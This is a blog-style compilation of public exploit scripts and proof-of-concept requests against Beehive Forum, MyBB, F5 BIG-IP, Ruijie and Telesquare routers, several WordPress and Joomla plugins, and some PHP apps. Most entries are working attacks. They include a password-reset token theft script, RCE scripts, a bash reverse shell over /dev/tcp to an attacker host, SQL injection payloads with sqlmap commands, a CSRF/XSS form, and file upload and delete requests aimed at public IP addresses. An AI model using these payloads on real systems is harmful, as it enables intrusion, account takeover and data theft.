# Exploit Title: Beehive Forum - Account Takeover
# Date:08/05/2022.
# Exploit Author: Pablo Santiago
# Vendor Homepage: https://www.beehiveforum.co.uk/
# Software Link: https://sourceforge.net/projects/beehiveforum/
# Version: 1.5.2
# Tested on: Kali Linux and Ubuntu 20.0.4
# CVE N/A
# PoC: https://imgur.com/a/hVlgpCg
# Vulnerability: In the functionality "forgot password", it's possible to
modify the Header "Host", #injecting malicious host, allowing stealing the
token and resetting the password from a victim.#(Requires user interaction)
import requests
from bs4 import BeautifulSoup
import socket
import sys
import urllib.parse
import random
import string
endpoint = sys.argv[1]
lhost = sys.argv[2]
lport = int(sys.argv[3])
hostheader = f'{lhost}:{lport}'
url_forgot = f'http://{endpoint}/forum/forgot_pw.php'
url_change = f'http://{endpoint}/forum/change_pw.php'
def init_req():
session = requests.Session()
r = session.get(url_forgot)
cookie = session.cookies.get_dict()
cookie = cookie['sess_hash']
soup = BeautifulSoup(r.text, 'lxml')
hash_request = soup.input['id']
csrf_token = soup.input['value']
return hash_request, csrf_token, cookie
def forgot_req(hash_request: str, csrf_token: str, cookie: str):
headers= {
'Host': hostheader,
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0)
Gecko/20100101 Firefox/97.0',
'Accept-Language': 'es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3',
'Cookie' : 'sess_hash=' + cookie
}
data = {
hash_request : csrf_token,
'webtag' : 'TEST',
'logon' : 'admin',
'request' : 'Request'
}
r = requests.post(url_forgot, headers=headers, data=data)
if('You should shortly receive an e-mail containing instructions for
resetting your password' in r.text):
print('')
print('[*] A mail has been sent to the victim')
socket_req()
else:
print('[*] The mail has not been sent')
def socket_req():
print(f"[*] Listening on port {lport}...." )
print('[*] Waitting the victim clicks in the malicious link\n')
s = socket.socket()
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((lhost, lport))
s.listen()
(sock_c, _) = s.accept()
get_request = sock_c.recv(4096)
user_token = urllib.parse.unquote_plus(get_request.split(b"
HTTP")[0][-13:].decode("UTF-8"))
print("[*] Stole token: " + user_token)
change_pw(user_token)
def change_pw(user_token: str):
c = string.ascii_letters + string.digits
password = ''.join(random.choice(c) for _ in range(6))
hash_request, csrf_token, cookie = init_req()
headers= {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0)
Gecko/20100101 Firefox/97.0',
'Accept-Language': 'es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3',
'Cookie' : 'sess_hash=' + cookie
}
data = {
hash_request : csrf_token,
'webtag' : 'TEST',
'u' : '1',
'h' : user_token,
'pw' : password,
'cpw' : password,
'save' : 'Save'
}
r = requests.post(url_change, headers=headers, data=data)
if('Your password has been changed' in r.text):
print(f'[*] The password has been changed to: {password}')
else:
print('[*] The password has been changed')
hash_request, csrf_token, cookie = init_req()
forgot_req(hash_request, csrf_token, cookie)
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863113579
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: MyBB 1.8.29 - Remote Code Execution (RCE) (Authenticated)
# Date: 2022-05-08
# Exploit Author: Altelus
# Vendor Homepage: https://mybb.com/
# Software Link: https://github.com/mybb/mybb/releases/tag/mybb_1829
# Version: MyBB 1.8.29
# Tested on: Linux
# CVE : CVE-2022-24734
# An RCE can be obtained on MyBB's Admin CP in Configuration -> Add New Setting.
# The user must have a rights to add or update setting. This is tested on MyBB 1.8.29.
# The vulnerability may have existed as early as 1.4.0 since this
# 'php' checking is introduced in 1.4.0 (https://github.com/mybb/mybb/security/advisories/GHSA-876v-gwgh-w57f)
import requests
import argparse
import random
import string
from base64 import b64decode
from bs4 import BeautifulSoup
def login(username, password):
data = {
"username" : username,
"password" : password,
"do" : "login"
}
login_txt = r_client.post(host + "/admin/index.php", data=data).text
if "The username and password combination you entered is invalid" in login_txt:
print("[-] Login failure. Incorrect credentials supplied")
exit(0)
print("[+] Login successful!")
def add_settings(cmd, raw_cmd=""):
config_settings_txt = r_client.get(host + "/admin/index.php?module=config-settings&action=add").text
if "Access Denied" in config_settings_txt:
print("[-] Supplied user doesn't have the rights to add a setting")
exit(0)
print("[*] Adding a malicious settings...")
soup = BeautifulSoup(config_settings_txt, "lxml")
my_post_key = soup.find_all("input", {"name" : "my_post_key"})[0]['value']
rand_string = get_rand_string()
if raw_cmd != "":
extra = "\" . system('{}') .\"".format(raw_cmd)
else:
extra = "\" . system('{} | base64 -w 0') .\"".format(cmd)
data = {
"my_post_key" : my_post_key,
"title" : "An innocent setting",
"description" : "An innocent description",
"gid" : 1,
"disporder" : "",
"name" : rand_string,
"type" : "\tphp",
"extra" : extra,
"value" : "An innocent value"
}
post_setting = r_client.post(host + "/admin/index.php?module=config-settings&action=add",data=data,allow_redirects=False)
if post_setting.status_code != 302:
soup = BeautifulSoup(post_setting.text, "lxml")
error_txt = soup.find_all("div", {"class" : "error"})[0].text
print("[-] Exploit didn't work. Reason: '{}'".format(error_txt))
exit(0)
print("[+] Malicious post settings accepted!")
return rand_string
def get_rand_string(length=20):
return ''.join(random.choice(string.ascii_letters) for i in range(length))
def get_cmd_result(ident_string, raw_cmd=""):
conf_settings_list = r_client.get(host + "/admin/index.php?module=config-settings&action=change").text
soup = BeautifulSoup(conf_settings_list, "lxml")
row_setting = soup.find_all("tr", {"id" : "row_setting_{}".format(ident_string)})[0]
cmd_result = row_setting.find_all("div", {"class" : "form_row"})[0].text
if raw_cmd == "":
cmd_result = b64decode(cmd_result[2:]).decode()
print("[+] Result: {}".format(str(cmd_result)))
parser = argparse.ArgumentParser()
parser.add_argument('--username', required=True, help="MyBB Admin CP username")
parser.add_argument('--password', required=True, help="MyBB Admin CP password")
parser.add_argument('--host', required=True, help="e.g. http://target.website.local, http://10.10.10.10, http://192.168.23.101:8000")
parser.add_argument('--cmd', required=False, help="Command to run")
parser.add_argument('--raw_cmd', required=False, help="Command to run directly into system()")
args = parser.parse_args()
username = args.username
password = args.password
host = args.host
cmd = "id" if args.cmd == None else args.cmd
raw_cmd = "" if args.raw_cmd == None else args.raw_cmd
r_client = requests.Session()
login(username, password)
ident_string = add_settings(cmd, raw_cmd=raw_cmd)
get_cmd_result(ident_string, raw_cmd=raw_cmd)
# Exploit Title: Joomla Plugin SexyPolling 2.1.7 - SQLi
# Google Dork: intext:"Powered by Sexy Polling"
# Date: 2022-02-08
# Exploit Author: Wolfgang Hotwagner
# Vendor Homepage: https://2glux.com/projects/sexypolling
# Software Link: https://2glux.com/downloads/files/free/sexypolling_pack_2.1.7_2glux.com.zip
# Version: all versions below version 2.1.8
# Tested on: Debian Bullseye
SexyPolling SQL Injection
====================
| Identifier: | AIT-SA-20220208-01|
| Target: | Sexy Polling ( Joomla Extension) |
| Vendor: | 2glux |
| Version: | all versions below version 2.1.8 |
| CVE: | Not yet |
| Accessibility: | Remote |
| Severity: | Critical |
| Author: | Wolfgang Hotwagner (AIT Austrian Institute of Technology) |
Summary
========
[Sexy Polling is a Joomla Extension for votes.](https://2glux.com/projects/sexypolling). In all versions below 2.1.8 an unauthenticated attacker could execute arbitrary SQL commands by sending crafted POST-parameters to poll.php.
Vulnerability Description
====================
In the vote.php file, the POST parameters min_date and max_date are insufficiently checked and sanitized. An attacker can use these parameters to send payloads for sql injections.
In lines 74 and 75 in the *site/vote.php* code, the parameters are assigned without being checked:
```
$min_date_sent = isset($_POST['min_date']) ? $_POST['min_date'].' 00:00:00' : '';
$max_date_sent = isset($_POST['max_date']) ? $_POST['max_date'].' 23:59:59' : '';
```
These are later used unfiltered by the WHERE clause:
```
$query_toal = "SELECT
COUNT(sv.`id_answer`) total_count,
MAX(sv.`date`) max_date,
MIN(sv.`date`) min_date
FROM
`#__sexy_votes` sv
JOIN
`#__sexy_answers` sa ON sa.id_poll = '$polling_id'
AND
sa.published = '1'
WHERE
sv.`id_answer` = sa.id";
//if dates are sent, add them to query
if ($min_date_sended != '' && $max_date_sended != '')
$query_toal .= " AND sv.`date` >= '$min_date_sended' AND sv.`date` <= '$max_date_sended' ";
```
Proof Of Concept
==============
To check a system for vulnerability, modify the POST request so that the min_date parameter contains a single apostrophe.
HTTP-Request:
```
POST /components/com_sexypolling/vote.php HTTP/1.1
Host: joomla-server.local
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
HTTP_X_REAL_IP: 1.1.1.1
Content-Length: 193
Origin: joomla-server.local
Connection: close
Referer: joomla-server.local/index.php/component/search/
Cookie: 3f7d6b4d84916c70a46aaf5501d04983=iuddgl57g75v5gruopdqh0cgd6
polling_id=1&answer_id[]=3&dateformat=digits&min_date=2021-12-07'&max_date=2021-12-14&country_name=-&country_code=-&city_name=-®ion_name=-&voting_period=24&ae9a061e2170d406fb817b9ec0c42918=1
```
The HTTP-Resoonse contains a mysql error:
```
HTTP/1.1 500 Internal Server Error
Date: Wed, 15 Dec 2021 10:27:40 GMT
Server: Apache/2.4.41 (Ubuntu)
Set-Cookie: PHPSESSID=39p4ql2oj0b45opsf6p105tfcf; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: sexy_poll_1=1639564060; expires=Thu, 16-Dec-2021 10:27:40 GMT; Max-Age=86400; path=/
Content-Length: 4768
Connection: close
Content-Type: application/json
<!DOCTYPE html>
<html lang="en-gb" dir="ltr">
<head>
<meta charset="utf-8" />
<title>Error: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '00:00:00' AND sv.`date` <= '2021-12-14 23:59:59'' at line 12</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link href="https://fonts.googleapis.com/css?family=Open+Sans" rel="stylesheet" />
```
Vulnerable Versions
================
All versions below version 2.1.8
Tested Versions
=============
Sexy Polling ( Joomla Extension) 2.1.7
Impact
======
An unauthenticated attacker could inject and execute SQL commands on the database.
Mitigation
=========
Sexy Polling 2.1.8 fixed that issue
Vendor Contact Timeline
====================
| 2021-12-14 | Unable to find a contact of the vendor |
| 2021-12-15 | Contacting Joomla Security Strike Team |
| 2021-12-29 | Answer from the Joomla Security Strike Team that they will investigate the problem. |
| 2022-01-01 | Sexy Polling releases 2.1.8 |
| 2022-04-08 | Public Disclosure |
*We would like to note that the communication about this issue was weak. The contact-form of the maintainer of sexy_polling was broken and there was no other contact published. The Joomla Security Strike Team let us know that they will investigate, but they did not send any updates about the progress.*
Advisory URL
===========
[https://www.ait.ac.at/ait-sa-20220208-01-sexypolling](https://www.ait.ac.at/ait-sa-20220208-01-sexypolling)
# Exploit Title: WordPress Plugin stafflist 3.1.2 - SQLi (Authenticated)
# Date: 05-02-2022
# Exploit Author: Hassan Khan Yusufzai - Splint3r7
# Vendor Homepage: https://wordpress.org/plugins/stafflist/
# Version: 3.1.2
# Tested on: Firefox
# Contact me: h [at] spidersilk.com
# Vulnerable Code:
$w = (isset($_GET['search']) && (string) trim($_GET['search'])!="" ?
...
$where = ($w ? "WHERE LOWER(lastname) LIKE '%{$w}%' OR
LOWER(firstname) LIKE '%{$w}%' OR
LOWER(department) LIKE '%{$w}%' OR
LOWER(email) LIKE '%{$w}%'" : "");
# Vulnerable URL
http://localhost:10003/wp-admin/admin.php?page=stafflist&search=[SQLI]
# POC
```
sqlmap -u 'http://localhost:10003/wp-admin/admin.php?page=stafflist&search=test*'
--cookie="wordpress_cookies_paste_here"
```
# POC Image
https://prnt.sc/AECcFRHhe2ib
Exploit Title: WordPress Plugin Blue Admin 21.06.01 - Cross-Site Request Forgery (CSRF)
Date: 2021-07-27
Exploit Author : WordPress Plugin Blue Admin 21.06.01 - Cross-Site Request Forgery (CSRF)
Vendor Homepage : https://wpscan.com/plugin/blue-admi
Version : <= 21.06.01
Tested on: windows 10 Professional
CVE : CVE-2021-24581
<html>
<body>
<form action="http://example.com/wp-admin/admin.php?page=blue-admin&tab=blue_admin_login_page" method="POST" enctype="multipart/form-data">
<input type="hidden" name="ba_lp_attr[fm_bg_color]" value="FFFFFF" />
<input type="hidden" name="ba_lp_attr[fm_color]" value="777777" />
<input type="hidden" name="ba_lp_attr[logo_text]" value='WP"><script>alert(/XSS/)</script>' />
<input type="hidden" name="ba_lp_attr[logo_url]" value="https://example.com" />
<input type="hidden" name="ba_lp_attr[logo_img]" value="" />
<input type="hidden" name="ba_lp_attr[bg_color]" value="EEEEEE" />
<input type="hidden" name="ba_lp_attr[text_color]" value="222222" />
<input type="hidden" name="ba_lp_attr[bg_img]" value="" />
<input type="hidden" name="ba_lp_attr[bg_img_pos]" value="" />
<input type="hidden" name="ba_lp_attr[bg_img_rep]" value="" />
<input type="hidden" name="ba_lp_options_save" value="Save changes" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
# Exploit Title: Ruijie Reyee Mesh Router - Remote Code Execution (RCE) (Authenticated)
# Google Dork: None
# Date: November 1, 2021
# Exploit Author: Minh Khoa of VSEC
# Vendor Homepage: https://ruijienetworks.com
# Software Link: https://www.ruijienetworks.com/resources/products/1896-1900
# Version: ReyeeOS 1.55.1915 - EW_3.0(1)B11P35 and EW_3.0(1)B11P55
# Tested on: Ruijie RG-EW1200, Ruijie RG-EW1200G PRO
# CVE: CVE-2021-43164
#!/usr/bin/python3
import os
import sys
import time
import requests
import json
def enc(PASS):
key = "RjYkhwzx$2018!"
shell = "echo '{}' | openssl enc -aes-256-cbc -a -k '{}' -md md5 2>/dev/null".format(PASS, key)
return os.popen(shell).read().strip()
try:
TARGET = sys.argv[1]
USER = sys.argv[2]
PASS = sys.argv[3]
COMMAND = sys.argv[4]
except Exception:
print("CVE-2021-43164 PoC")
print("Usage: python3 exploit.py <target> <user> <pass> <command>")
print("Example: python3 exploit.py 192.168.110.1 admin password 'touch /tmp/pwned'")
sys.exit(1)
endpoint = "http://{}/cgi-bin/luci/api/auth".format(TARGET)
payload = {
"method": "login",
"params": {
"username": USER,
"password": enc(PASS),
"encry": True,
"time": int(time.time()),
"limit": False
}
}
r = requests.post(endpoint, json=payload)
sid = json.loads(r.text)["data"]["sid"]
endpoint = "http://{}/cgi-bin/luci/api/wireless?auth={}".format(TARGET, sid)
payload = {
"method": "updateVersion",
"params": {
"jsonparam": "'; {} #".format(COMMAND)
}
}
r = requests.post(endpoint, json=payload)
print(r.text)
# Exploit Title: TLR-2005KSH - Arbitrary File Upload
# Date: 2022-05-11
# Shodan Dork: title:"Login to TLR-2021"
# Exploit Author: Ahmed Alroky
# Author Company : Aiactive
# Version: 1.0.0
# Vendor home page : http://telesquare.co.kr/
# Authentication Required: No
# Tested on: Windows
# CVE: CVE-2021-45428
# Vulnerability Description
# Due to the Via WebDAV (Web Distributed Authoring and Versioning),
# on the remote server,telesquare TLR-2021 allows unauthorized users to upload
# any file(e.g. asp, aspx, cfm, html, jhtml, jsp, shtml) which causes
# remote code execution as well.
# Due to the WebDAV, it is possible to upload the arbitrary
# file utilizing the PUT method.
# Proof-of-Concept
# Request
PUT /l6f3jd6cbf.txt HTTP/1.1
Host: 223.62.114.233:8081<http://223.62.114.233:8081/>
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Connection: close
Content-Length: 10
# Exploit Title: F5 BIG-IP 16.0.x - Remote Code Execution (RCE)
# Exploit Author: Yesith Alvarez
# Vendor Homepage: https://www.f5.com/products/big-ip-services
# Version: 16.0.x
# CVE : CVE-2022-1388
from requests import Request, Session
import sys
import json
def title():
print('''
_______ ________ ___ ___ ___ ___ __ ____ ___ ___
/ ____\ \ / / ____| |__ \ / _ \__ \|__ \ /_ |___ \ / _ \ / _ \
| | \ \ / /| |__ ______ ) | | | | ) | ) |_____| | __) | (_) | (_) |
| | \ \/ / | __|______/ /| | | |/ / / /______| ||__ < > _ < > _ <
| |____ \ / | |____ / /_| |_| / /_ / /_ | |___) | (_) | (_) |
\_____| \/ |______| |____|\___/____|____| |_|____/ \___/ \___/
Author: Yesith Alvarez
Github: https://github.com/yealvarez
Linkedin: https://www.linkedin.com/in/pentester-ethicalhacker/
''')
def exploit(url, lhost, lport):
url = url + 'mgmt/tm/util/bash'
data = {
"command":"run",
"utilCmdArgs":"-c 'bash -i >& /dev/tcp/"+lhost+"/"+lport+" 0>&1'"
}
headers = {
'Authorization': 'Basic YWRtaW46',
'Connection':'keep-alive, X-F5-Auth-Token',
'X-F5-Auth-Token': '0'
}
s = Session()
req = Request('POST', url, json=data, headers=headers)
prepped = req.prepare()
del prepped.headers['Content-Type']
resp = s.send(prepped,
verify=False,
timeout=15
)
#print(prepped.headers)
#print(url)
#print(resp.headers)
#print(resp.json())
print(resp.status_code)
if __name__ == '__main__':
title()
if(len(sys.argv) < 4):
print('[+] USAGE: python3 %s https://<target_url> lhost lport\n'%(sys.argv[0]))
print('[+] USAGE: python3 %s https://192.168.0.10 192.168.0.11 4444\n'%(sys.argv[0]))
print('[+] Do not forget to run the listener: nc -lvp 4444\n')
exit(0)
else:
exploit(sys.argv[1],sys.argv[2],sys.argv[3])
# Exploit Title: TLR-2005KSH - Arbitrary File Delete
# Date: 2022-05-11
# Exploit Author: Ahmed Alroky
# Author Company : AIactive
# Version: 1.0.0
# Vendor home page : http://telesquare.co.kr/
# Authentication Required: No
# Tested on: Windows
# CVE: CVE-2021-46424
# Proof-of-Concept
# Request
DELETE /cgi-bin/test2.txt HTTP/1.1
Host: 220.89.223.215:8083
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
# Exploit Title: Royal Event Management System 1.0 - 'todate' SQL Injection (Authenticated)
# Date: 2022-26-03
# Exploit Author: Eren Gozaydin
# Vendor Homepage: https://www.sourcecodester.com/php/15238/event-management-system-project-php-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/Royal%20Event.zip
# Version: 1.0
# Tested on: Windows 10 Pro + PHP 8.0.11, Apache 2.4.51
# CVE: CVE-2022-28080
# References: https://nvd.nist.gov/vuln/detail/CVE-2022-28080
------------------------------------------------------------------------------------
1. Description:
----------------------
Royal Event Management System 1.0 allows SQL Injection via parameter 'todate' in
/royal_event/btndates_report.php#?= Exploiting this issue could allow an attacker to compromise
the application, access or modify data, or exploit latent vulnerabilities
in the underlying database.
2. Proof of Concept:
----------------------
In Burpsuite intercept the request from the affected page with
'todate' parameter and save it like poc.txt. Then run SQLmap to extract the
data from the database:
sqlmap -r poc.txt --dbms=mysql
3. Example payload:
----------------------
(boolean-based)
-1%27+OR+1%3d1+OR+%27ns%27%3d%27ns
4. Burpsuite request:
----------------------
POST /royal_event/btndates_report.php#?= HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 334
Content-Type: multipart/form-data; boundary=f289a6438bcc45179bcd3eb7ddc555d0
Cookie: PHPSESSID=qeoe141g7guakhacf152a3i380
Referer: http://localhost/royal_event/btndates_report.php#?=
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
--f289a6438bcc45179bcd3eb7ddc555d0
Content-Disposition: form-data; name="todate"
-1' OR 1=1 OR 'ns'='ns
--f289a6438bcc45179bcd3eb7ddc555d0
Content-Disposition: form-data; name="search"
3
--f289a6438bcc45179bcd3eb7ddc555d0
Content-Disposition: form-data; name="fromdate"
01/01/2011
--f289a6438bcc45179bcd3eb7ddc555d0--
# Exploit Title: College Management System - 'course_code' SQL Injection (Authenticated)
# Date: 2022-24-03
# Exploit Author: Eren Gozaydin
# Vendor Homepage: https://code-projects.org/college-management-system-in-php-with-source-code/
# Software Link: https://download.code-projects.org/details/1c3b87e5-f6a6-46dd-9b5f-19c39667866f
# Version: 1.0
# Tested on: Windows 10 Pro + PHP 8.0.11, Apache 2.4.51
# CVE: CVE-2022-28079
# References: https://nvd.nist.gov/vuln/detail/CVE-2022-28079
------------------------------------------------------------------------------------
1. Description:
----------------------
College Management System 1.0 allows SQL Injection via parameter 'course_code' in
/College-Management-System/admin/asign-single-student-subjects.php. Exploiting this issue could allow an attacker to compromise
the application, access or modify data, or exploit latent vulnerabilities
in the underlying database.
2. Proof of Concept:
----------------------
In Burpsuite intercept the request from the affected page with
'course_code' parameter and save it like poc.txt Then run SQLmap to extract the
data from the database:
sqlmap -r poc.txt --dbms=mysql
3. Example payload:
----------------------
boolean-based blind
Payload: submit=Press&roll_no=3&course_code=-6093' OR 2121=2121 AND 'ddQQ'='ddQQ
4. Burpsuite request:
----------------------
POST /College-Management-System/admin/asign-single-student-subjects.php HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 80
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=jhnlvntmv8q4gtgsof9l1f1hhe
Referer: http://localhost/College-Management-System/admin/asign-single-student-subjects.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
submit=Press&roll_no=3&course_code=Select+Course%27+OR+1%3d1+OR+%27ns%27%3d%27ns
# Exploit Title: SDT-CW3B1 1.1.0 - OS command injection
# Date: 2022-05-12
# Exploit Author: Ahmed Alroky
# Author Company : AIactive
# Version: 1.0.0
# Vendor home page : http://telesquare.co.kr/
# Authentication Required: No
# CVE : CVE-2021-46422
# Tested on: Windows
# HTTP Request
GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=id HTTP/1.1
Host: IP_HERE
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Accept: */*
Referer: http:// IP_HERE /admin/system_command.shtml
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
# Exploit Title: T-Soft E-Commerce 4 - SQLi (Authenticated)
# Exploit Author: Alperen Ergel
# Contact: @alpernae (IG/TW)
# Software Homepage: https://www.tsoft.com.tr/
# Version : v4
# Tested on: Kali Linux
# Category: WebApp
# Google Dork: N/A
# CVE: 2022-28132
# Date: 18.02.2022
######## Description ###########################################
#
#
#
# Step-1: Login as Admin or with privilage user
# Step-2: Open burp or zap and request the {PoC REQUEST PATH} vulnerable path
# Step-3: Capture the request save as .txt
# Step-4: Run SQLMAP with this command 'sqlmap -r {req.txt} --dbs --level 5 --risk 3 --tamper=space2comment' --random-agent'
# Step-5: Now you're be able to see the dbs for more search 'how to use sqlmap advance'
#
# Impact: Attacker can see the what have in database and it's big impact and attacker can stole datas...
#
#
#
######## Proof of Concept ########################################
========>>> REQUEST <<<=========
GET /Y/Moduller/_Urun/Json.php?_dc=1646232925144&sort=kayittarihi&dir=DESC&AramaKelimesi=&AramaKriteri=UrunAdi&SatisAlt=&SatisUst=
&marka=&model=&tedarikci=&AlisAlt=&AlisUst=&KdvAlt=&KdvUst=&StokAlt=&StokUst=&birim=&extra=&kategori=&Kategori=&gor=0&ind=0¥i=0&karsila=0&ana=0&grup=&firsat=0&mercek=0&kdvGoster=0&filtre=0&video=0&xml_not_update_price=0&xml_not_update_stock=0&multi_category_sort=0&simge=&desiAlt=&desiUst=&agirlikAlt=&agirlikUst=&stokBirim=&FirsatBaslamaTarihiBas=&FirsatBaslamaTarihiSon=&FirsatBitisTarihiBas=&FirsatBitisTarihiSon=&UrunEklemeTarihiBas=&UrunEklemeTarihiSon=&havaleAlt=&havaleUst=&page=1&start=0&limit=20 HTTP/2
Host: domain.com
Cookie: lang=tr; v4=on; nocache=1; TSOFT_USER=xxx@xx.com; customDashboardMapping=true; countryCode=TR; rest1SupportUser=0; nocache=1; yayinlanmaDurumuPopup=1; yayinlanmaDurumuPopupTimeout=864000; PHPSESSID=fcfa85a5603de7b64bc08eaf68bc51ca; U_TYPE_CK=131; U_TYPE_OK=c16a5320fa475530d9583c34fd356ef5; TSOFT_LOGGED=7d025a34d0526c8896d713159b0d1ffe; email=; phone=; password=
Sec-Ch-Ua: "(Not(A:Brand";v="8", "Chromium";v="98"
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Sec-Ch-Ua-Platform: "Linux"
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://domain.com/srv/admin/products/products-v2/index
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
=============> RESULTS OF THE SQLMAP <==========================
Parameter: SatisAlt (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: _dc=1646232925144&sort=kayittarihi&dir=DESC&AramaKelimesi=&AramaKriteri=UrunAdi&SatisAlt=' AND 1331=1331 AND 'RcAU'='RcAU&SatisUst=&marka=&model=&tedarikci=&AlisAlt=&AlisUst=&KdvAlt=&KdvUst=&StokAlt=&StokUst=&birim=&extra=&kategori=&Kategori=&gor=0&ind=0¥i=0&karsila=0&ana=0&grup=&firsat=0&mercek=0&kdvGoster=0&filtre=0&video=0&xml_not_update_price=0&xml_not_update_stock=0&multi_category_sort=0&simge=&desiAlt=&desiUst=&agirlikAlt=&agirlikUst=&stokBirim=&FirsatBaslamaTarihiBas=&FirsatBaslamaTarihiSon=&FirsatBitisTarihiBas=&FirsatBitisTarihiSon=&UrunEklemeTarihiBas=&UrunEklemeTarihiSon=&havaleAlt=&havaleUst=&page=1&start=0&limit=20
---
back-end DBMS: MySQL 5
available databases [2]:
[*] d25082_db
[*] information_schema
[13:05:31] [INFO] GET parameter 'SatisAlt' appears to be 'SQLite > 2.0 OR time-based blind (heavy query)' injectable
# Exploit Title: T-Soft E-Commerce 4 - 'UrunAdi' Stored Cross-Site Scripting (XSS)
# Exploit Author: Alperen Ergel (alpernae IG/TW)
# Web Site: https://alperenae.gitbook.io/
# Software Homepage: https://www.tsoft.com.tr/
# Version : v4
# Tested on: Kali Linux
# Category: WebApp
# Google Dork: N/A
# Date: 2022-05-10
# CVE :N/A
######## Description ########
#
# 1-) Login administrator page and add product
#
# 2-) add product name to xss payload
#
# 3-) Back to web site then will be work payload
#
#
######## Proof of Concept ########
========>>> REQUEST <<<=========
POST /Y/Moduller/_Urun/Ekle/Action.php HTTP/1.1
Host: domain.com
Cookie: lang=tr; v4=on; nocache=1; TSOFT_USER=xxxx@xxx.com; customDashboardMapping=true; PHPSESSID=18d05ae557640c93fd9739e241850438; rest1SupportUser=0; nocache=1; last_products=12
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 1028
Origin: https://domain.com
Dnt: 1
Referer: https://domain.com/srv/admin/products/save-edit/index?id=12
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
task=UPDATE&Kategori=18&UrunId=12&UrunAdi={PAYLOAD}&MarkaId=0&MarkaAd=&ModelId=0&ModelAd=&Tedarikci=0&TedarikciKodu=12&StokSayisi=100
&StokBirimId=1&StokBirimAd=Adet&EnYeniUrun=0&EnCokSatilan=0&AramaKelimeleri=&HamSatis=200&AlisFiyat=100&HavaleYuzde=0&Birim=0
&KDV=18&KdvGoster=false&point_catalog=false&IndirimliUrun=true&AltUrunVar=false&YeniUrun=true&AnaSayfaUrun=true&VitrinUrun=false
&Gorunme=true&BayiUrun=false&SiparisNotuGoster=false&En=0&Boy=0&Derinlik=0&Agirlik=0&Desi=1&GarantiBilgisi=
&TeslimatBilgisi=&UrunNot=&WsUrunKodu=T12&SeoAyar=3&SeoTitle=&SeoLink=deneme-urun-1&SeoDesc=&SeoKeyw=
&Detay=%C3%9Cr%C3%BCn%20ekleme%20konusunda%20detayl%C4%B1%20bilgi%20i%C3%A7in%2C%20videomuzu%20
izleyebilirsiniz%3A%C2%A0%0A%3Cdiv%3E%3Ca%20href%3D%22https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DoWlUHvi4IPw%22%3Ehttps%3A%2F%2Fwww.youtube.com%
2Fwatch%3Fv%3DoWlUHvi4IPw%3C%2Fa%3E%3C%2Fdiv%3E&AnaKategoriId=18&point=0&subscribe=0&subscribe_frequency=&subscribe_discount_rate=0
